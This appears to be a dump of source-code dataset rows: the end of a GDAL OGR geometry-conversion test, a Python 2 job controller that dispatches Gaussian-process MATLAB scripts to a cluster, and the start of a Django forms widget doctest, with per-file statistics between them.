('CIRCULARSTRING(0 0,1 0,0 0)', 'MULTISURFACE (CURVEPOLYGON (CIRCULARSTRING (0 0,1 0,0 0)))', ogr.wkbMultiSurface),
('CIRCULARSTRING(0 0,1 0,0 0)', 'LINESTRING (0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)', ogr.wkbLineString),
('CIRCULARSTRING(0 0,1 1,2 2)', 'LINESTRING (0 0,1 1,2 2)', ogr.wkbLineString),
('CIRCULARSTRING(0 0,1 1,2 2)', 'MULTILINESTRING ((0 0,1 1,2 2))', ogr.wkbMultiLineString),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbPolygon),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbCurvePolygon),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbMultiSurface),
('CIRCULARSTRING(0 0,1 1,2 2)', None, ogr.wkbMultiPolygon),
('COMPOUNDCURVE ((2 5,10 20))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 1,2 2))', 'LINESTRING (0 0,1 1,2 2)', ogr.wkbLineString ),
('COMPOUNDCURVE ((2 5,10 20),(10 20,30 40))', 'LINESTRING(2 5,10 20,30 40)', ogr.wkbLineString ),
('COMPOUNDCURVE ((2 5,10 20),(10 20,30 40))', 'MULTILINESTRING((2 5,10 20,30 40))', ogr.wkbMultiLineString ),
('COMPOUNDCURVE ((2 5,10 20),(10 20,30 40))', 'MULTICURVE (COMPOUNDCURVE ((2 5,10 20),(10 20,30 40)))', ogr.wkbMultiCurve ),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'CURVEPOLYGON (COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0)))', ogr.wkbCurvePolygon),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'POLYGON ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbPolygon),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))))', ogr.wkbMultiSurface),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTIPOLYGON (((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)))', ogr.wkbMultiPolygon),
('COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))', 'LINESTRING (0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)', ogr.wkbLineString),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE ((0 0,0 1,1 1,0 0))))', ogr.wkbMultiSurface ),
('COMPOUNDCURVE((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', ogr.wkbCurvePolygon ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('POLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('POLYGON ((0 0,0 1,1 1,0 0))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('CURVEPOLYGON ((0 0,0 1,1 1,0 0))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE ((0 0,0 1,1 1,0 0))))', ogr.wkbMultiSurface ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', ogr.wkbCurvePolygon ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1),(0 1,1 1,0 0)))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'POLYGON ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbPolygon),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTISURFACE (CURVEPOLYGON ( CIRCULARSTRING (0 0,1 0,0 0)))', ogr.wkbMultiSurface),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTIPOLYGON (((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)))', ogr.wkbMultiPolygon),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCompoundCurve),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbMultiCurve),
('CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))', 'MULTILINESTRING ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbMultiLineString),
('MULTICURVE ((2 5,10 20))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('MULTICURVE ((2 5,10 20))', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('MULTICURVE ((2 5,10 20))', 'MULTILINESTRING ((2 5,10 20))', ogr.wkbMultiLineString ),
('MULTICURVE (COMPOUNDCURVE((2 5,10 20)))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('MULTICURVE (COMPOUNDCURVE((2 5,10 20)))', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('MULTICURVE (COMPOUNDCURVE((2 5,10 20)))', 'MULTILINESTRING ((2 5,10 20))', ogr.wkbMultiLineString ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTICURVE ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('MULTICURVE (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTICURVE (COMPOUNDCURVE((0 0,0 1,1 1,0 0)))', 'MULTISURFACE (CURVEPOLYGON (COMPOUNDCURVE ((0 0,0 1,1 1,0 0))))', ogr.wkbMultiSurface ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbUnknown ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTISURFACE (((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('MULTISURFACE (((0 0,0 1,1 1,0 0)))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25)))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0),(0.25 0.25,0.25 0.75,0.75 0.75,0.25 0.25))', ogr.wkbCurvePolygon ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'LINESTRING (0 0,0 1,1 1,0 0)', ogr.wkbLineString ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'COMPOUNDCURVE ((0 0,0 1,1 1,0 0))', ogr.wkbCompoundCurve ),
('MULTISURFACE (CURVEPOLYGON(CIRCULARSTRING(0 0,1 0,0 0)))', 'COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCompoundCurve ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'MULTILINESTRING ((0 0,0 1,1 1,0 0))', ogr.wkbMultiLineString ),
('MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,0 0)))', 'MULTICURVE ((0 0,0 1,1 1,0 0))', ogr.wkbMultiCurve ),
('MULTISURFACE (CURVEPOLYGON(CIRCULARSTRING(0 0,1 0,0 0)))', 'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbMultiCurve ),
('MULTIPOINT (2 5)', 'POINT(2 5)', ogr.wkbPoint ),
]
for (src_wkt, exp_wkt, target_type) in tests:
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
gdal.SetConfigOption('OGR_ARC_STEPSIZE', '45')
dst_geom = ogr.ForceTo( src_geom, target_type )
gdal.SetConfigOption('OGR_ARC_STEPSIZE', None)
if exp_wkt is None:
exp_wkt = src_wkt
elif target_type != ogr.wkbUnknown and dst_geom.GetGeometryType() != target_type:
gdaltest.post_reason('fail')
print(src_wkt)
print(target_type)
print(dst_geom.ExportToWkt())
return 'fail'
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
gdaltest.post_reason('fail')
print(src_wkt)
print(target_type)
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
gdaltest_list = [
ogr_factory_1,
ogr_factory_2,
ogr_factory_3,
ogr_factory_4,
ogr_factory_5,
ogr_factory_6,
ogr_factory_7,
ogr_factory_8,
]
if __name__ == '__main__':
gdaltest.setup_run( 'ogr_factory' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| 52.916667
| 638
| 0.607102
| 4,545
| 32,385
| 4.240264
| 0.065567
| 0.063512
| 0.031133
| 0.029265
| 0.805729
| 0.779888
| 0.763699
| 0.738844
| 0.727947
| 0.696658
| 0
| 0.200814
| 0.218404
| 32,385
| 611
| 639
| 53.003273
| 0.560564
| 0.053636
| 0
| 0.421801
| 0
| 0.047393
| 0.476664
| 0.094385
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021327
| false
| 0
| 0.011848
| 0
| 0.120853
| 0.075829
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
409b002a1e32b64c87720f224933503f404d6aa6
| 12,616
|
py
|
Python
|
source/job_controller.py
|
OpenXAIProject/Relational-Automatic-Statistician
|
417425dc623126475595902d6e7ab6a7b685bc56
|
[
"Apache-2.0",
"MIT"
] | 22
|
2019-07-23T04:15:58.000Z
|
2021-10-06T00:42:38.000Z
|
source/job_controller.py
|
OpenXAIProject/Relational-Automatic-Statistician
|
417425dc623126475595902d6e7ab6a7b685bc56
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
source/job_controller.py
|
OpenXAIProject/Relational-Automatic-Statistician
|
417425dc623126475595902d6e7ab6a7b685bc56
|
[
"Apache-2.0",
"MIT"
] | 8
|
2019-07-23T05:56:42.000Z
|
2021-05-20T21:21:50.000Z
|
'''
Main file for dispatching jobs to a cluster, creates remote files, etc.
@authors: David Duvenaud (dkd23@cam.ac.uk)
James Robert Lloyd (jrl44@cam.ac.uk)
Roger Grosse (rgrosse@mit.edu)
Created Jan 2013
'''
import flexible_function as ff
from flexible_function import GPModel
import grammar
import gpml
import utils.latex
import utils.fear
try:
import config
except:
print '\n\nERROR : source/config.py not found\n\nPlease create it following example file as a guide\n\n'
raise Exception('No config')
from utils import gaussians, psd_matrices
import numpy as np
nax = np.newaxis
# import pylab
import scipy.io
import sys
import os
import tempfile
import subprocess
import time
import cblparallel
from cblparallel.util import mkstemp_safe
import re
import shutil
import random
def evaluate_models(models, X, y, verbose=True, iters=300, local_computation=False, zip_files=False, max_jobs=500, random_seed=0, subset=False, subset_size=250, full_iters=0, bundle_size=1):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Create data file
if verbose:
print 'Creating data file locally'
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y})
# Move to fear if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create a list of MATLAB scripts to assess and optimise parameters for each kernel
if verbose:
print 'Creating scripts'
scripts = [None] * len(models)
for (i, model) in enumerate(models):
parameters = {'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s', # N.B. cblparallel manages output files
'gpml_path': cblparallel.gpml_path(local_computation),
'mean_syntax': model.mean.get_gpml_expression(dimensions=X.shape[1]),
'mean_params': '[ %s ]' % ' '.join(str(p) for p in model.mean.param_vector),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1]),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
'lik_syntax': model.likelihood.get_gpml_expression(dimensions=X.shape[1]),
'lik_params': '[ %s ]' % ' '.join(str(p) for p in model.likelihood.param_vector),
'inference': model.likelihood.gpml_inference_method,
'iters': str(iters),
'seed': str(np.random.randint(2**31)),
'subset': 'true' if subset else 'false',
'subset_size' : str(subset_size),
'full_iters' : str(full_iters)}
scripts[i] = gpml.OPTIMIZE_KERNEL_CODE % parameters
#### Need to be careful with % signs
#### For the moment, cblparallel expects no single % signs - FIXME
scripts[i] = re.sub('% ', '%% ', scripts[i])
# Send to cblparallel and save output_files
if verbose:
print 'Sending scripts to cblparallel'
if local_computation:
output_files = cblparallel.run_batch_locally(scripts, language='matlab', max_cpu=1.1, job_check_sleep=5, submit_sleep=0.1, max_running_jobs=10, verbose=verbose)
else:
output_files = cblparallel.run_batch_on_fear(scripts, language='matlab', max_jobs=max_jobs, verbose=verbose, zip_files=zip_files, bundle_size=bundle_size)
# Read in results
results = [None] * len(models)
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Reading output file %d of %d' % (i + 1, len(models))
results[i] = GPModel.from_matlab_output(gpml.read_outputs(output_file), models[i], ndata)
# Tidy up local output files
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Removing output file %d of %d' % (i + 1, len(models))
os.remove(output_file)
# Remove temporary data file (perhaps on the cluster server)
cblparallel.remove_temp_file(data_file, local_computation)
# Return results i.e. list of ScoredKernel objects
return results
def my_evaluate_models(models, X, y, verbose=True, iters=300, local_computation=False, zip_files=False, max_jobs=500, random_seed=0, subset=False, subset_size=250, full_iters=0, bundle_size=1):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Create data file
if verbose:
print 'Creating data file locally'
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y})
# Move to fear if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create a list of MATLAB scripts to assess and optimise parameters for each kernel
if verbose:
print 'Creating scripts'
scripts = [None] * len(models)
for (i, model) in enumerate(models):
parameters = {'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s', # N.B. cblparallel manages output files
'gpml_path': cblparallel.gpml_path(local_computation),
# 'mean_syntax': model.mean.get_gpml_expression(dimensions=X.shape[1]),
# 'mean_params': '[ %s ]' % ' '.join(str(p) for p in model.mean.param_vector),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1]),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
# 'lik_syntax': model.likelihood.get_gpml_expression(dimensions=X.shape[1]),
# 'lik_params': '[ %s ]' % ' '.join(str(p) for p in model.likelihood.param_vector),
# 'inference': model.likelihood.gpml_inference_method,
# 'iters': str(iters),
# 'seed': str(np.random.randint(2**31)),
# 'subset': 'true' if subset else 'false',
# 'subset_size' : str(subset_size),
# 'full_iters' : str(full_iters)
}
scripts[i] = gpml.MATLAB_SKL_CODE % parameters
#### Need to be careful with % signs
#### For the moment, cblparallel expects no single % signs - FIXME
scripts[i] = re.sub('% ', '%% ', scripts[i])
# Send to cblparallel and save output_files
if verbose:
print 'Sending scripts to cblparallel'
if local_computation:
output_files = cblparallel.run_batch_locally(scripts, language='matlab', max_cpu=1.1, job_check_sleep=5, submit_sleep=0.1, max_running_jobs=10, verbose=verbose)
else:
output_files = cblparallel.run_batch_on_fear(scripts, language='matlab', max_jobs=max_jobs, verbose=verbose, zip_files=zip_files, bundle_size=bundle_size)
# Read in results
results = [None] * len(models)
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Reading output file %d of %d' % (i + 1, len(models))
results[i] = GPModel.my_from_matlab_output(gpml.my_read_outputs(output_file), models[i], ndata)
# Tidy up local output files
for (i, output_file) in enumerate(output_files):
if verbose:
print 'Removing output file %d of %d' % (i + 1, len(models))
os.remove(output_file)
# Remove temporary data file (perhaps on the cluster server)
cblparallel.remove_temp_file(data_file, local_computation)
# Return results i.e. list of ScoredKernel objects
return results
def make_predictions(X, y, Xtest, ytest, model, local_computation=False, max_jobs=500, verbose=True, random_seed=0, no_noise=False):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Save temporary data file in standard temporary directory
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y, 'Xtest' : Xtest, 'ytest' : ytest})
# Copy onto cluster server if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create prediction code
parameters ={'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s',
'gpml_path': cblparallel.gpml_path(local_computation),
'mean_syntax': model.mean.get_gpml_expression(dimensions=X.shape[1]),
'mean_params': '[ %s ]' % ' '.join(str(p) for p in model.mean.param_vector),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1]),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
'lik_syntax': model.likelihood.get_gpml_expression(dimensions=X.shape[1]),
'lik_params': '[ %s ]' % ' '.join(str(p) for p in model.likelihood.param_vector),
'inference': model.likelihood.gpml_inference_method,
'iters': str(30),
'seed': str(random_seed)}
code = gpml.PREDICT_AND_SAVE_CODE % parameters
code = re.sub('% ', '%% ', code) # HACK - cblparallel currently does not like % signs
# Evaluate code - potentially on cluster
if local_computation:
temp_results_file = cblparallel.run_batch_locally([code], language='matlab', max_cpu=1.1, max_mem=1.1, verbose=verbose)[0]
else:
temp_results_file = cblparallel.run_batch_on_fear([code], language='matlab', max_jobs=max_jobs, verbose=verbose)[0]
results = scipy.io.loadmat(temp_results_file)
# Remove temporary files (perhaps on the cluster server)
cblparallel.remove_temp_file(temp_results_file, local_computation)
cblparallel.remove_temp_file(data_file, local_computation)
# Return dictionary of MATLAB results
return results
"""
function my_make_predictions can make predictions on multipe time series
@author : Heechan Lee(lhc101020@unist.ac.kr, SAIL lab)
"""
def my_make_predictions(X, y, Xtest, ytest, model, local_computation=False, max_jobs=500, verbose=True, random_seed=0, no_noise=False, best_depth=0, txt_filename=''):
# Make data into matrices in case they're unidimensional.
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Save temporary data file in standard temporary directory
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y, 'Xtest' : Xtest, 'ytest' : ytest})
# Copy onto cluster server if necessary
if not local_computation:
if verbose:
print 'Moving data file to fear'
cblparallel.copy_to_remote(data_file)
# Create prediction code
parameters ={'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s',
'params_file' : txt_filename+'lvl_'+str(best_depth)+'_0.mat1.mat',
'gpml_path': cblparallel.gpml_path(local_computation),
'kernel_syntax': model.kernel.get_gpml_expression(dimensions=X.shape[1])
#'kernel_params': '[ %s ]' % ' '.join(str(p) for p in model.kernel.param_vector),
#'inference': model.likelihood.gpml_inference_method,
#'iters': str(30),
#'seed': str(random_seed)
}
code = gpml.MATLAB_SKL_PRED_CODE % parameters
code = re.sub('% ', '%% ', code) # HACK - cblparallel currently does not like % signs
# Evaluate code - potentially on cluster
if local_computation:
temp_results_file = cblparallel.run_batch_locally([code], language='matlab', max_cpu=1.1, max_mem=1.1, verbose=verbose)[0]
else:
temp_results_file = cblparallel.run_batch_on_fear([code], language='matlab', max_jobs=max_jobs, verbose=verbose)[0]
results = scipy.io.loadmat(temp_results_file)
# Remove temporary files (perhaps on the cluster server)
cblparallel.remove_temp_file(temp_results_file, local_computation)
cblparallel.remove_temp_file(data_file, local_computation)
# Return dictionary of MATLAB results
return results
| 46.382353
| 193
| 0.638713
| 1,660
| 12,616
| 4.678916
| 0.151205
| 0.03296
| 0.025235
| 0.034762
| 0.885284
| 0.885284
| 0.885284
| 0.879748
| 0.879748
| 0.879748
| 0
| 0.012075
| 0.245086
| 12,616
| 271
| 194
| 46.553506
| 0.803444
| 0.192613
| 0
| 0.735632
| 0
| 0.005747
| 0.108921
| 0
| 0
| 0
| 0
| 0.00369
| 0
| 0
| null | null | 0
| 0.114943
| null | null | 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40c4d017932414573c9723aa3913426d61d7e0fe
| 48,906
|
py
|
Python
|
tests/regressiontests/forms/widgets.py
|
hugs/django
|
3690ab217e3a65d01bd2f9d25f05fb2e54815693
|
[
"BSD-3-Clause"
] | 2
|
2015-12-04T12:05:26.000Z
|
2016-05-08T11:26:55.000Z
|
tests/regressiontests/forms/widgets.py
|
hugs/django
|
3690ab217e3a65d01bd2f9d25f05fb2e54815693
|
[
"BSD-3-Clause"
] | null | null | null |
tests/regressiontests/forms/widgets.py
|
hugs/django
|
3690ab217e3a65d01bd2f9d25f05fb2e54815693
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
tests = r"""
>>> from django.forms import *
>>> from django.forms.widgets import RadioFieldRenderer
>>> from django.utils.safestring import mark_safe
>>> import datetime
>>> import time
>>> import re
>>> try:
... from decimal import Decimal
... except ImportError:
... from django.utils._decimal import Decimal
###########
# Widgets #
###########
Each Widget class corresponds to an HTML form widget. A Widget knows how to
render itself, given a field name and some data. Widgets don't perform
validation.
# TextInput Widget ############################################################
>>> w = TextInput()
>>> w.render('email', '')
u'<input type="text" name="email" />'
>>> w.render('email', None)
u'<input type="text" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="text" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="text" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
